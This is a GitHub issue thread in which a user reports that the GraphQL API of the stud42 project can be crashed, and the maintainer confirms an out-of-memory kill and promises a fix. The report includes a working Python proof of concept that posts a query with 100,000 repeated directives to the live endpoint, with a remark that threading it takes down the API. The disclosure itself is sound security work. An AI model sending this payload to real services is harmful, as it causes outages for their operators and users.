### ISSUE TITLE
fix: uncontrolled resource consumption

### ISSUE THREAD

**Issue by c3b5aw** [42Atomys/stud42#412]
### Describe the bug

You can crash the API pod by overloading the graphql parser.

With a bit of threading you can take down the whole API:
![image](https://user-images.githubusercontent.com/7050552/227405725-4946775b-9e78-4234-b58c-4765d0ea0870.png)

### To Reproduce

```python
import requests
import time

url = 'https://s42.app/graphql'
max_size = int(1e5)
payload = {'query': 'query{\n__typename ' + ('@a'*max_size) + '\n}', 'variables': {}, 'operationName': None}

headers = {
    'Content-Type': 'application/json',
}

try:
    start = time.monotonic()
    response = requests.request('POST', url, headers=headers, json=payload)
    end = time.monotonic()
    print(response.text)
    print(f'Elapsed time: {end-start}')
except requests.exceptions.ConnectionError:
    print('Connection closed.')
```

### Version of software

idk

### Environment

Live (https://s42.app)

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by 42Atomys** [comment]
Confirmed on our end, the issue is caused by an `OOMKilled` error. This query is currently parsed but not filtered by the HTTP handler. 

I will begin fixing it for the next release.
